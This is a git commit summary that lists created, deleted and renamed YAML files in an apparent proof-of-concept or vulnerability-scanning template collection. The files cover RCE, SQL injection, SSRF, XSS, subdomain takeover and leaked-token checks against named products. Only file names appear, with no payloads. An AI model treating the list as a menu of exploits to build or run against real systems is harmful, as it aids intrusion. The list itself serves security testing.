poc/remote_code_execution/{springboot-h2-db-rce.yaml => springboot-h2-db-rce-10455.yaml} (100%) delete mode 100644 poc/remote_code_execution/springboot-log4j-rce.yaml create mode 100644 poc/remote_code_execution/symfonyrce.yaml delete mode 100644 poc/remote_code_execution/tamronos-rce-10647.yaml delete mode 100644 poc/remote_code_execution/thinkcmf-rce-10725.yaml delete mode 100644 poc/remote_code_execution/thinkphp-2-rce-10738.yaml create mode 100644 poc/remote_code_execution/thinkphp-2-rce-10740.yaml create mode 100644 poc/remote_code_execution/thinkphp-501-rce-10743.yaml delete mode 100644 poc/remote_code_execution/thinkphp-501-rce.yaml create mode 100644 poc/remote_code_execution/unifi-network-log4j-rce.yaml delete mode 100644 poc/remote_code_execution/visual-tools-dvr-rce-11030.yaml delete mode 100644 poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml delete mode 100644 poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11033.yaml create mode 100644 poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml create mode 100644 poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce.yaml delete mode 100644 poc/remote_code_execution/vrealize-operations-log4j-rce.yaml delete mode 100644 poc/remote_code_execution/webui-rce-11170.yaml create mode 100644 poc/remote_code_execution/wordpress-emails-verification-for-woocommerce-11271.yaml create mode 100644 poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml create mode 100644 poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml create mode 100644 poc/remote_code_execution/wp-woocommerce-file-download.yaml create mode 100644 poc/remote_code_execution/yapi-rce-11725.yaml create mode 100644 poc/remote_code_execution/yarn-resourcemanager-rce-11735.yaml create mode 100644 poc/remote_code_execution/yisaitong-dataImport-rce.yaml create mode 100644 poc/ruby/grails-database-admin-console-7819.yaml delete mode 100644 poc/ruby/grails-database-admin-console-7821.yaml delete mode 100644 poc/ruby/rails-database-config-9802.yaml rename poc/ruby/{rails-secret-token-disclosure-9809.yaml => rails-secret-token-disclosure-9810.yaml} (100%) delete mode 100644 poc/ruby/rails6-xss-9798.yaml create mode 100644 poc/ruby/ruby-on-rails-framework-exceptions-9920.yaml delete mode 100644 poc/samba/samba-config.yaml delete mode 100644 poc/sap/sap-netweaver-detect-10047.yaml create mode 100644 poc/sap/sap-netweaver-info-leak.yaml delete mode 100644 poc/sap/sap-netweaver-webgui-10058.yaml create mode 100644 poc/sap/sap-recon-detect-10062.yaml delete mode 100644 poc/sap/sap-recon-detect-10063.yaml delete mode 100644 poc/sap/sap-redirect-10064.yaml create mode 100644 poc/sap/sap-web-dispatcher-10078.yaml create mode 100644 poc/sap/sap-web-dispatcher-admin-portal-10070.yaml create mode 100644 poc/search/aws-opensearch-login-649.yaml delete mode 100644 poc/search/aws-opensearch-login-650.yaml delete mode 100644 poc/search/elasticsearch-7193.yaml create mode 100644 poc/search/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/search/elasticsearch-sql-client-detect.yaml create mode 100644 poc/search/searches.yaml delete mode 100644 poc/sensitive/sensitive-storage-exposure-10143.yaml create mode 100644 poc/sensitive/sensitive-storage-exposure-10144.yaml create mode 100644 poc/shopify/shopify-custom-token(1).yaml rename poc/shopify/{shopify-custom-token-10198.yaml => shopify-custom-token-11860.yaml} (100%) delete mode 100644 poc/shopify/shopify-private-token-10199.yaml create mode 100644 poc/shopify/shopify-shared-secret-11862.yaml create mode 100644 poc/shopify/shopify-takeover-10201.yaml create mode 100644 poc/smtp/easy-wp-smtp-listing-7157.yaml create mode 100644 poc/smtp/esmtp-detect.yaml create mode 100644 poc/smtp/esmtprc-config-7260.yaml create mode 100644 poc/smtp/smtp-commands-enum.yaml create mode 100644 poc/smtp/smtp-user-enum.yaml create mode 100644 poc/smtp/totemomail-smtp-detect.yaml delete mode 100644 poc/social/api-twitter-507.yaml create mode 100644 poc/social/api-twitter.yaml create mode 100644 poc/social/facebook-secret-11849.yaml delete mode 100644 poc/social/facebook-secret-7386.yaml delete mode 100644 poc/social/flow-flow-social-stream-xss-7524.yaml create mode 100644 poc/social/flow-flow-social-stream-xss.yaml delete mode 100644 poc/social/linkedin-client-id.yaml create mode 100644 poc/social/sassy-social-share-10086.yaml mode change 100644 => 100755 poc/social/sassy-social-share-xss.yaml rename poc/social/{sassy-social-share-10083.yaml => sassy-social-share.yaml} (100%) delete mode 100644 poc/social/twitter-secret(1).yaml create mode 100644 poc/social/twitter-secret-10862.yaml rename poc/social/{instagram-feed.yaml => wordpress-instagram-feed.yaml} (100%) delete mode 100644 poc/social/wp-socialfit-xss-11577.yaml delete mode 100644 poc/sql/74cms-sqli-10.yaml delete mode 100644 poc/sql/SQLInjection_ERROR.yaml create mode 100644 poc/sql/adb-backup-enabled-62.yaml delete mode 100644 poc/sql/adb-backup-enabled-63.yaml create mode 100644 poc/sql/android-debug-database-exposed-314.yaml create mode 100644 poc/sql/api-abuseipdb-384.yaml delete mode 100644 poc/sql/api-abuseipdb.yaml delete mode 100644 poc/sql/buildbot-panel.yml create mode 100644 poc/sql/couchdb-adminparty-1237.yaml delete mode 100644 poc/sql/couchdb-exposure-1238.yaml create mode 100644 poc/sql/couchdb-exposure-1239.yaml create mode 100644 poc/sql/dbeaver-credentials-6780.yaml delete mode 100644 poc/sql/dbeaver-credentials-6782.yaml delete mode 100644 poc/sql/dedecms-membergroup-sqli-6796.yaml create mode 100644 poc/sql/duomicms-sql-injection-7122.yaml create mode 100644 poc/sql/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/sql/elasticsearch-sql-client-detect.yaml delete mode 100644 poc/sql/error-based-sql-injection-7249.yaml create mode 100644 poc/sql/etouch-v2-sqli.yaml delete mode 100644 poc/sql/exposed-mysql-initial.yaml create mode 100644 poc/sql/glpi-9.3.3-sql-injection.yaml create mode 100644 poc/sql/grails-database-admin-console-7819.yaml delete mode 100644 poc/sql/grails-database-admin-console-7821.yaml delete mode 100644 poc/sql/hasura-graphql-psql-exec-7902.yaml create mode 100644 poc/sql/hasura-graphql-psql-exec.yaml create mode 100644 poc/sql/influxdb-detect-8159.yaml create mode 100644 poc/sql/jdbc-connection-string-8244.yaml delete mode 100644 poc/sql/jdbc-connection-string.yaml create mode 100644 poc/sql/kevinlab-bems-sqli-8460.yaml delete mode 100644 poc/sql/kevinlab-bems-sqli.yaml delete mode 100644 poc/sql/mongodb-ops-manager-8922.yaml delete mode 100644 poc/sql/mongodb-unauth.yaml delete mode 100644 poc/sql/openerp-database-9275.yaml create mode 100644 poc/sql/openerp-database-9277.yaml create mode 100644 poc/sql/oracle-dbass-detect-9351.yaml delete mode 100644 poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml delete mode 100644 poc/sql/pbootcms-database-file-download-9469.yaml delete mode 100644 poc/sql/phpmyadmin-sql-9535.yaml create mode 100644 poc/sql/phpmyadmin-sql-9536.yaml create mode 100644 poc/sql/pikpikcusqli.yaml rename poc/sql/{puppetdb-detect-9718.yaml => puppetdb-detect-9719.yaml} (100%) create mode 100644 poc/sql/puppetdb-detect.yaml delete mode 100644 poc/sql/python-app-sql-exceptions-9744.yaml create mode 100644 poc/sql/python-app-sql-exceptions.yaml delete mode 100644 poc/sql/rails-database-config-9802.yaml delete mode 100644 poc/sql/sequoiadb-default-login-10151.yaml create mode 100644 poc/sql/sequoiadb-default-login-10152.yaml create mode 100644 poc/sql/simple-crm-sql-injection-10278.yaml delete mode 100644 poc/sql/springboot-h2-db-rce-10454.yaml rename poc/sql/{springboot-h2-db-rce.yaml => springboot-h2-db-rce-10455.yaml} (100%) delete mode 100644 poc/sql/sql-dump-10497.yaml create mode 100644 poc/sql/sql-server-reporting-10509.yaml delete mode 100644 poc/sql/sqli.yaml delete mode 100644 poc/sql/sqliheader.yaml rename poc/sql/{suspicious-sql-error-messages.yaml => suspicious-sql-error-messages-10585.yaml} (100%) rename poc/sql/{symfony-database-config-10616.yaml => symfony-database-config.yaml} (100%) create mode 100644 poc/sql/thumbs-db-disclosure-10761.yaml delete mode 100644 poc/sql/thumbs-db-disclosure-10763.yaml delete mode 100644 poc/sql/tidb-unauth-10772.yaml create mode 100644 poc/sql/ucmdb-default-login-10871.yaml delete mode 100644 poc/sql/ucmdb-default-login.yaml create mode 100644 poc/sql/wordpress-db-repair.yaml delete mode 100644 poc/sql/wuzhicms-sqli-11656.yaml delete mode 100644 poc/sql/xdcms-sqli-11664.yaml delete mode 100644 poc/sql/xdcms-sqli.yaml rename poc/sql/{yongyou-jdbcread.yaml => yongyou-icurrtype-sqli.yaml} (100%) create mode 100644 poc/sql/yonyou-nc-downtax-sqli.yaml create mode 100644 poc/sql/yonyou-nc-warningdetailinfo-sqli.yaml delete mode 100644 poc/sql/zcms-v3-sqli-11773.yaml delete mode 100644 poc/sql_injection/74cms-sqli-10.yaml delete mode 100644 poc/sql_injection/SQLInjection_ERROR.yaml delete mode 100644 poc/sql_injection/dedecms-membergroup-sqli-6796.yaml create mode 100644 poc/sql_injection/etouch-v2-sqli.yaml create mode 100644 poc/sql_injection/kevinlab-bems-sqli-8460.yaml delete mode 100644 poc/sql_injection/kevinlab-bems-sqli.yaml delete mode 100644 poc/sql_injection/sqliheader.yaml delete mode 100644 poc/sql_injection/wuzhicms-sqli-11656.yaml delete mode 100644 poc/sql_injection/xdcms-sqli-11664.yaml delete mode 100644 poc/sql_injection/xdcms-sqli.yaml create mode 100644 poc/sql_injection/yongyou-icurrtype-sqli.yaml create mode 100644 poc/sql_injection/yonyou-nc-downtax-sqli.yaml create mode 100644 poc/sql_injection/yonyou-nc-warningdetailinfo-sqli.yaml delete mode 100644 poc/sql_injection/zcms-v3-sqli-11773.yaml create mode 100644 poc/ssrf/cloudflare-image-ssrf-1022.yaml create mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/ssrf/confluence-ssrf-sharelinks-1193.yaml delete mode 100644 poc/ssrf/hasura-graphql-ssrf-7905.yaml rename poc/ssrf/{microstrategy-ssrf-8859.yaml => microstrategy-ssrf-8860.yaml} (100%) delete mode 100644 poc/ssrf/microstrategy-ssrf-8861.yaml create mode 100644 poc/ssrf/openbmcs-ssrf-9261.yaml delete mode 100644 poc/ssrf/openbmcs-ssrf.yaml delete mode 100644 poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml delete mode 100644 poc/ssrf/targa-camera-ssrf-10658.yaml create mode 100644 poc/ssrf/targa-camera-ssrf.yaml delete mode 100644 poc/ssrf/umbraco-base-ssrf-10880.yaml create mode 100644 poc/ssrf/umbraco-base-ssrf-10881.yaml create mode 100644 poc/ssrf/vmware-vcenter-ssrf-11053.yaml create mode 100644 poc/ssrf/vmware-vcenter-ssrf.yaml create mode 100644 poc/ssrf/wp-multiple-theme-ssrf-11513.yaml delete mode 100644 poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml create mode 100644 poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml create mode 100644 poc/ssrf/yongyou-ssrf-11745.yaml rename poc/ssrf/{zimbra-preauth-ssrf.yaml => zimbra-preauth-ssrf-11811.yaml} (100%) create mode 100644 poc/subdomain_takeover/acquia-takeover-35.yaml create mode 100644 poc/subdomain_takeover/aftership-takeover-203.yaml delete mode 100644 poc/subdomain_takeover/aftership-takeover-204.yaml delete mode 100644 poc/subdomain_takeover/agilecrm-takeover-208.yaml create mode 100644 poc/subdomain_takeover/aha-takeover-214.yaml delete mode 100644 poc/subdomain_takeover/aha-takeover-216.yaml delete mode 100644 poc/subdomain_takeover/airee-takeover-227.yaml create mode 100644 poc/subdomain_takeover/airee-takeover-228.yaml create mode 100644 poc/subdomain_takeover/anima-takeover-317.yaml delete mode 100644 poc/subdomain_takeover/anima-takeover-318.yaml create mode 100644 poc/subdomain_takeover/aws-bucket-takeover-630.yaml delete mode 100644 poc/subdomain_takeover/aws-bucket-takeover-632.yaml delete mode 100644 poc/subdomain_takeover/azure-takeover-detection-681.yaml delete mode 100644 poc/subdomain_takeover/bigcartel-takeover-727.yaml create mode 100644 poc/subdomain_takeover/bigcartel-takeover-729.yaml delete mode 100644 poc/subdomain_takeover/brightcove-takeover-783.yaml create mode 100644 poc/subdomain_takeover/brightcove-takeover-785.yaml create mode 100644 poc/subdomain_takeover/cargo-takeover-866.yaml delete mode 100644 poc/subdomain_takeover/cargo-takeover-868.yaml create mode 100644 poc/subdomain_takeover/cargocollective-takeover-864.yaml delete mode 100644 poc/subdomain_takeover/cargocollective-takeover-865.yaml create mode 100644 poc/subdomain_takeover/flexbe-takeover-7505.yaml delete mode 100644 poc/subdomain_takeover/flexbe-takeover-7506.yaml create mode 100644 poc/subdomain_takeover/flywheel-takeover-7526.yaml delete mode 100644 poc/subdomain_takeover/flywheel_takeover.yaml delete mode 100644 poc/subdomain_takeover/freshdesk-takeover-7541.yaml create mode 100644 poc/subdomain_takeover/gemfury-takeover-7576.yaml delete mode 100644 poc/subdomain_takeover/gemfury-takeover-7577.yaml create mode 100644 poc/subdomain_takeover/ghost-takeover-7619.yaml delete mode 100644 poc/subdomain_takeover/ghost-takeover-7622.yaml create mode 100644 poc/subdomain_takeover/hatenablog-takeover-7907.yaml delete mode 100644 poc/subdomain_takeover/hatenablog-takeover-7910.yaml create mode 100644 poc/subdomain_takeover/helpjuice-takeover-7926.yaml delete mode 100644 poc/subdomain_takeover/helpjuice-takeover-7927.yaml create mode 100644 poc/subdomain_takeover/helprace-takeover-7929.yaml delete mode 100644 poc/subdomain_takeover/helprace-takeover-7932.yaml delete mode 100644 poc/subdomain_takeover/helpscout-takeover-7934.yaml create mode 100644 poc/subdomain_takeover/helpscout-takeover-7935.yaml create mode 100644 poc/subdomain_takeover/heroku-takeover-7941.yaml create mode 100644 poc/subdomain_takeover/hubspot-takeover-8077.yaml delete mode 100644 poc/subdomain_takeover/hubspot-takeover-8078.yaml delete mode 100644 poc/subdomain_takeover/intercom-takeover-8167.yaml create mode 100644 poc/subdomain_takeover/jazzhr-takeover-8234.yaml delete mode 100644 poc/subdomain_takeover/jetbrains-takeover-8294.yaml delete mode 100644 poc/subdomain_takeover/kinsta-takeover-8494.yaml rename poc/subdomain_takeover/{landingi-takeover-8567.yaml => landingi-takeover-8566.yaml} (100%) delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8604.yaml delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8605.yaml create mode 100644 poc/subdomain_takeover/mashery-takeover-8783.yaml delete mode 100644 poc/subdomain_takeover/mashery-takeover-8785.yaml rename poc/subdomain_takeover/{medium-takeover-8797.yaml => medium-takeover-8798.yaml} (100%) create mode 100644 poc/subdomain_takeover/ngrok-takeover-9128.yaml create mode 100644 poc/subdomain_takeover/pantheon-takeover-9461.yaml delete mode 100644 poc/subdomain_takeover/proposify-takeover-9694.yaml create mode 100644 poc/subdomain_takeover/readme-takeover-9841.yaml delete mode 100644 poc/subdomain_takeover/readme-takeover-9843.yaml rename poc/subdomain_takeover/{readthedocs-takeover-9847.yaml => readthedocs-takeover-9844.yaml} (100%) create mode 100644 poc/subdomain_takeover/s3-subtakeover-9967.yaml create mode 100644 poc/subdomain_takeover/shopify-takeover-10201.yaml create mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10271.yaml delete mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10274.yaml delete mode 100644 poc/subdomain_takeover/smartjob-takeover-10323.yaml create mode 100644 poc/subdomain_takeover/smartjob-takeover-10324.yaml delete mode 100644 poc/subdomain_takeover/sprintful-takeover-10494.yaml create mode 100644 poc/subdomain_takeover/sprintful-takeover-10495.yaml create mode 100644 poc/subdomain_takeover/strikingly-takeover-10551.yaml create mode 100644 poc/subdomain_takeover/surveygizmo-takeover-10581.yaml delete mode 100644 poc/subdomain_takeover/surveygizmo-takeover-10582.yaml delete mode 100644 poc/subdomain_takeover/tave-takeover-10659.yaml create mode 100644 poc/subdomain_takeover/tave-takeover-10662.yaml create mode 100644 poc/subdomain_takeover/teamwork-takeover-10668.yaml delete mode 100644 poc/subdomain_takeover/teamwork-takeover-10669.yaml delete mode 100644 poc/subdomain_takeover/tictail-takeover-10767.yaml create mode 100644 poc/subdomain_takeover/tictail-takeover-10768.yaml delete mode 100644 poc/subdomain_takeover/tictail-takeover-10769.yaml create mode 100644 poc/subdomain_takeover/tilda-takeover-10783.yaml delete mode 100644 poc/subdomain_takeover/tilda-takeover-10784.yaml create mode 100644 poc/subdomain_takeover/tumblr-takeover-10845.yaml delete mode 100644 poc/subdomain_takeover/tumblr-takeover-10847.yaml create mode 100644 poc/subdomain_takeover/uberflip-takeover-10864.yaml delete mode 100644 poc/subdomain_takeover/uberflip-takeover-10867.yaml rename poc/subdomain_takeover/{uptimerobot-takeover-10989.yaml => uptimerobot-takeover-10987.yaml} (100%) rename poc/subdomain_takeover/{vend-takeover-10997.yaml => vend-takeover-10998.yaml} (100%) delete mode 100644 poc/subdomain_takeover/webflow-takeover-11131.yaml create mode 100644 poc/subdomain_takeover/webflow-takeover-11134.yaml create mode 100644 poc/subdomain_takeover/wishpond-takeover-11215.yaml delete mode 100644 poc/subdomain_takeover/wishpond-takeover-11216.yaml rename poc/subdomain_takeover/{wufoo-takeover-11649.yaml => wufoo-takeover-11650.yaml} (100%) create mode 100644 poc/subdomain_takeover/zendesk-takeover-11781.yaml delete mode 100644 poc/subdomain_takeover/zendesk-takeover-11783.yaml create mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 poc/upload/exposed-jquery-file-upload.yaml delete mode 100644 poc/upload/luftguitar-arbitrary-file-upload-8672.yaml create mode 100644 poc/upload/luftguitar-arbitrary-file-upload.yaml rename poc/upload/{oa-v9-uploads-file-9190.yaml => oa-v9-uploads-file-9191.yaml} (100%) create mode 100644 poc/upload/showdoc-file-upload-rce-10229.yaml delete mode 100644 poc/upload/telerik-fileupload-detect-10695.yaml create mode 100644 poc/upload/ueditor-file-upload-10875.yaml rename poc/upload/{ueditor-file-upload-10872.yaml => ueditor-file-upload.yaml} (100%) create mode 100644 poc/upload/unauthenticated-popup-upload-10922.yaml delete mode 100644 poc/upload/unauthenticated-popup-upload-10923.yaml mode change 100755 => 100644 poc/upload/wordpress-upload-data.yaml create mode 100644 poc/upload/wp-upload-data-11602.yaml delete mode 100644 poc/upload/wp-upload-data-11605.yaml delete mode 100644 poc/upload/zhiyuan-file-upload-11795.yaml delete mode 100644 poc/upload/zhiyuan-file-upload.yaml delete mode 100644 poc/vmware/vmware-horizon-11040.yaml create mode 100644 poc/vmware/vmware-horizon-11041.yaml delete mode 100644 poc/vmware/vmware-horizon-log4j-jndi-rce-11033.yaml create mode 100644 poc/vmware/vmware-horizon-log4j-jndi-rce.yaml create mode 100644 poc/vmware/vmware-horizon-panel-11037.yaml delete mode 100644 poc/vmware/vmware-vcenter-lfi-linux-11042.yaml delete mode 100644 poc/vmware/vmware-vcenter-lfi.yaml create mode 100644 poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml create mode 100644 poc/vmware/vmware-vcenter-ssrf-11053.yaml create mode 100644 poc/vmware/vmware-vcenter-ssrf.yaml delete mode 100644 poc/vmware/vmware-version-detect-11054.yaml rename poc/vmware/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect-11058.yaml} (100%) create mode 100644 poc/vmware/vmware-vrealize-detect.yaml create mode 100644 poc/vmware/vmware-workflow-11060.yaml rename poc/vmware/{vmware-workflow-11059.yaml => vmware-workflow.yaml} (100%) rename poc/web/{abyss-web-server-12.yaml => abyss-web-server-13.yaml} (100%) delete mode 100644 poc/web/abyss-web-server.yaml create mode 100644 poc/web/alphaweb-default-login-275.yaml create mode 100644 poc/web/artica-web-proxy-detect-543.yaml create mode 100644 poc/web/axigen-webmail-663.yaml create mode 100644 poc/web/azkaban-web-client-676.yaml rename poc/web/{azkaban-web-client-679.yaml => azkaban-web-client.yaml} (100%) delete mode 100644 poc/web/dixell-xweb500-filewrite.yaml rename poc/web/{ewebs-arbitrary-file-reading.yaml => ewebs-arbitrary-file-reading-7271.yaml} (100%) delete mode 100644 poc/web/fortiweb-panel-7537.yaml create mode 100644 poc/web/fortiweb-panel-7539.yaml delete mode 100644 poc/web/geovision-geowebserver-xss.yaml rename poc/web/{icewarp-webclient-rce.yaml => icewarp-webclient-rce-8129.yaml} (100%) delete mode 100644 poc/web/icinga-web-login-8136.yaml create mode 100644 poc/web/icinga-web-login-8137.yaml create mode 100644 poc/web/iplanet-web-server-8191.yaml create mode 100644 poc/web/microsoft-teams-webhook-8858.yaml rename poc/web/{microsoft-teams-webhook-8856.yaml => microsoft-teams-webhook.yaml} (100%) delete mode 100644 poc/web/microweber-detect-8862.yaml delete mode 100644 poc/web/microweber-xss.yaml delete mode 100644 poc/web/netsurveillance-web-9057.yaml create mode 100644 poc/web/netsurveillance-web.yaml delete mode 100644 poc/web/netsweeper-webadmin-detect-9068.yaml create mode 100644 poc/web/oracle-iplanet-web-server-9393.yaml create mode 100644 poc/web/oracle-iplanet-web-server.yaml delete mode 100644 poc/web/sap-netweaver-webgui-10058.yaml create mode 100644 poc/web/sap-web-dispatcher-10078.yaml create mode 100644 poc/web/sap-web-dispatcher-admin-portal-10070.yaml delete mode 100644 poc/web/webcamxp-5-11122.yaml create mode 100644 poc/web/webcamxp-5.yaml create mode 100644 poc/web/webeditors-11129.yaml delete mode 100644 poc/web/webflow-takeover-11131.yaml create mode 100644 poc/web/webflow-takeover-11134.yaml delete mode 100644 poc/web/weblogic-weak-login.yaml create mode 100644 poc/web/webmin-panel-11158.yaml delete mode 100644 poc/web/webmin-panel-11159.yaml delete mode 100644 poc/web/webmodule-ee-panel-11161.yaml delete mode 100644 poc/web/webui-rce-11170.yaml create mode 100644 poc/web/webview-universal-access-11184.yaml delete mode 100644 poc/web/webview-universal-access-11185.yaml create mode 100644 poc/web/xp-webcam-11698.yaml rename poc/web/{xp-webcam-11697.yaml => xp-webcam.yaml} (100%) create mode 100644 poc/wordpress/easy-wp-smtp-listing-7157.yaml delete mode 100644 poc/wordpress/feedwordpress-xss-7459.yaml delete mode 100644 poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml delete mode 100644 poc/wordpress/nativechurch-wp-theme-lfd-9004.yaml delete mode 100644 poc/wordpress/trilithic-viewpoint-login.yaml create mode 100644 poc/wordpress/viewpoint-system-status-11016.yaml delete mode 100644 poc/wordpress/viewpoint-system-status-11018.yaml create mode 100644 poc/wordpress/wordpress-accessible-wpconfig-11234.yaml delete mode 100644 poc/wordpress/wordpress-affiliatewp-log-11240.yaml create mode 100644 poc/wordpress/wordpress-affiliatewp-log-11243.yaml create mode 100644 poc/wordpress/wordpress-bbpress-plugin-listing-11247.yaml delete mode 100644 poc/wordpress/wordpress-bbpress-plugin-listing.yaml create mode 100644 poc/wordpress/wordpress-db-repair.yaml rename poc/wordpress/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-directory-listing-11265.yaml create mode 100644 poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml create mode 100644 poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml create mode 100644 poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml create mode 100644 poc/wordpress/wordpress-instagram-feed.yaml create mode 100644 poc/wordpress/wordpress-lfi(1).yaml create mode 100644 poc/wordpress/wordpress-rce-simplefilelist-11302.yaml delete mode 100644 poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml rename poc/wordpress/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) mode change 100755 => 100644 poc/wordpress/wordpress-upload-data.yaml create mode 100644 poc/wordpress/wordpress-weak-credentials-11335.yaml create mode 100644 poc/wordpress/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/wordpress/wordpress-wordfence-lfi-11351.yaml create mode 100644 poc/wordpress/wordpress-workflow (copy 1).yaml rename poc/wordpress/{wordpress-workflow-11366.yaml => wordpress-workflow-11365.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml create mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml create mode 100644 poc/wordpress/wp-altair-listing-11405.yaml rename poc/wordpress/{wp-altair-listing-11406.yaml => wp-altair-listing.yaml} (100%) rename poc/wordpress/{wp-ambience-xss-11407.yaml => wp-ambience-xss-11408.yaml} (100%) delete mode 100644 poc/wordpress/wp-app-log-11411.yaml create mode 100644 poc/wordpress/wp-app-log-11412.yaml delete mode 100644 poc/wordpress/wp-arforms-listing-11415.yaml create mode 100644 poc/wordpress/wp-arforms-listing-11418.yaml create mode 100644 poc/wordpress/wp-church-admin-xss-11422.yaml delete mode 100644 poc/wordpress/wp-church-admin-xss-11423.yaml create mode 100644 poc/wordpress/wp-code-snippets-xss-11426.yaml delete mode 100644 poc/wordpress/wp-config-setup-11427.yaml create mode 100644 poc/wordpress/wp-config-setup-11428.yaml delete mode 100644 poc/wordpress/wp-custom-tables-xss-11431.yaml create mode 100644 poc/wordpress/wp-custom-tables-xss-11434.yaml delete mode 100644 poc/wordpress/wp-email-subscribers-listing.yaml delete mode 100644 poc/wordpress/wp-full-path-disclosure-11455.yaml create mode 100644 poc/wordpress/wp-full-path-disclosure-11457.yaml create mode 100644 poc/wordpress/wp-grimag-open-redirect-11462.yaml create mode 100644 poc/wordpress/wp-gtranslate-open-redirect-11465.yaml delete mode 100644 poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml create mode 100644 poc/wordpress/wp-idx-broker-platinum-listing.yaml create mode 100644 poc/wordpress/wp-install-11473.yaml rename poc/wordpress/{wp-install-11475.yaml => wp-install.yaml} (100%) create mode 100644 poc/wordpress/wp-iwp-client-listing-11478.yaml rename poc/wordpress/{wp-iwp-client-listing-11479.yaml => wp-iwp-client-listing.yaml} (100%) rename poc/wordpress/{wp-license-file-11491.yaml => wp-license-file-11489.yaml} (100%) create mode 100644 poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml delete mode 100644 poc/wordpress/wp-memphis-documents-library-lfi-11498.yaml delete mode 100644 poc/wordpress/wp-mstore-plugin-listing.yaml create mode 100644 poc/wordpress/wp-multiple-theme-ssrf-11513.yaml rename poc/wordpress/{wp-oxygen-theme-lfi-11523.yaml => wp-oxygen-theme-lfi.yaml} (100%) create mode 100644 poc/wordpress/wp-phpfreechat-xss-11525.yaml delete mode 100644 poc/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml delete mode 100644 poc/wordpress/wp-plugin-lifterlms-11536.yaml rename poc/wordpress/{wp-plugin-marmoset-viewer-xss-11538.yaml => wp-plugin-marmoset-viewer-xss-11537.yaml} (100%) create mode 100644 poc/wordpress/wp-plugin-utlimate-member-11541.yaml delete mode 100644 poc/wordpress/wp-plugin-utlimate-member-11542.yaml delete mode 100644 poc/wordpress/wp-popup-listing-11543.yaml create mode 100644 poc/wordpress/wp-popup-listing.yaml delete mode 100644 poc/wordpress/wp-qards-listing-11551.yaml rename poc/wordpress/{wp-qards-listing.yaml => wp-qards-listing-11552.yaml} (100%) rename poc/wordpress/{wp-revslider-file-download-11554.yaml => wp-revslider-file-download-11555.yaml} (100%) delete mode 100644 poc/wordpress/wp-securimage-xss-11560.yaml create mode 100644 poc/wordpress/wp-sfwd-lms-listing-11562.yaml rename poc/wordpress/{wp-simple-fields-lfi.yaml => wp-simple-fields-lfi-11571.yaml} (100%) delete mode 100644 poc/wordpress/wp-slideshow-xss-11575.yaml create mode 100644 poc/wordpress/wp-slideshow-xss-11576.yaml delete mode 100644 poc/wordpress/wp-socialfit-xss-11577.yaml create mode 100644 poc/wordpress/wp-tutor-lfi-11598.yaml rename poc/wordpress/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%) create mode 100644 poc/wordpress/wp-upload-data-11602.yaml delete mode 100644 poc/wordpress/wp-upload-data-11605.yaml create mode 100644 poc/wordpress/wp-vault-lfi-11611.yaml delete mode 100644 poc/wordpress/wp-woocommerce-file-download-11620.yaml create mode 100644 poc/wordpress/wp-woocommerce-file-download.yaml create mode 100644 poc/wordpress/wpmudev-my-calender-xss-11503.yaml create mode 100644 poc/wordpress/wptouch-open-redirect-11595.yaml delete mode 100644 poc/xss/accessibility-helper-xss-18.yaml delete mode 100644 poc/xss/accessibility-helper-xss-19.yaml delete mode 100644 poc/xss/akamai-arl-xss-246.yaml delete mode 100644 poc/xss/ckan-dom-based-xss-993.yaml rename poc/xss/{coldfusion-debug-xss.yaml => coldfusion-debug-xss-1153.yaml} (100%) delete mode 100644 poc/xss/concrete-xss-1178.yaml create mode 100644 poc/xss/dom-xss-siteminder.yaml delete mode 100644 poc/xss/elex-woocommerce-xss-7200.yaml delete mode 100644 poc/xss/elex-woocommerce-xss.yaml rename poc/xss/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) delete mode 100644 poc/xss/empirecms-xss-7220.yaml delete mode 100644 poc/xss/feedwordpress-xss-7459.yaml delete mode 100644 poc/xss/flow-flow-social-stream-xss-7524.yaml create mode 100644 poc/xss/flow-flow-social-stream-xss.yaml delete mode 100644 poc/xss/geovision-geowebserver-xss.yaml delete mode 100644 poc/xss/httpbin-xss-8052.yaml create mode 100644 poc/xss/httpbin-xss.yaml delete mode 100644 poc/xss/keycloak-xss-8480.yaml delete mode 100644 poc/xss/microweber-xss.yaml rename poc/xss/{mida-eframework-xss.yaml => mida-eframework-xss-8868.yaml} (100%) delete mode 100644 poc/xss/mida-eframework-xss-8869.yaml delete mode 100644 poc/xss/moodle-xss-8952.yaml create mode 100644 poc/xss/ms-exchange-server-reflected-xss-8962.yaml create mode 100644 poc/xss/nginx-module-vts-xss-9109.yaml 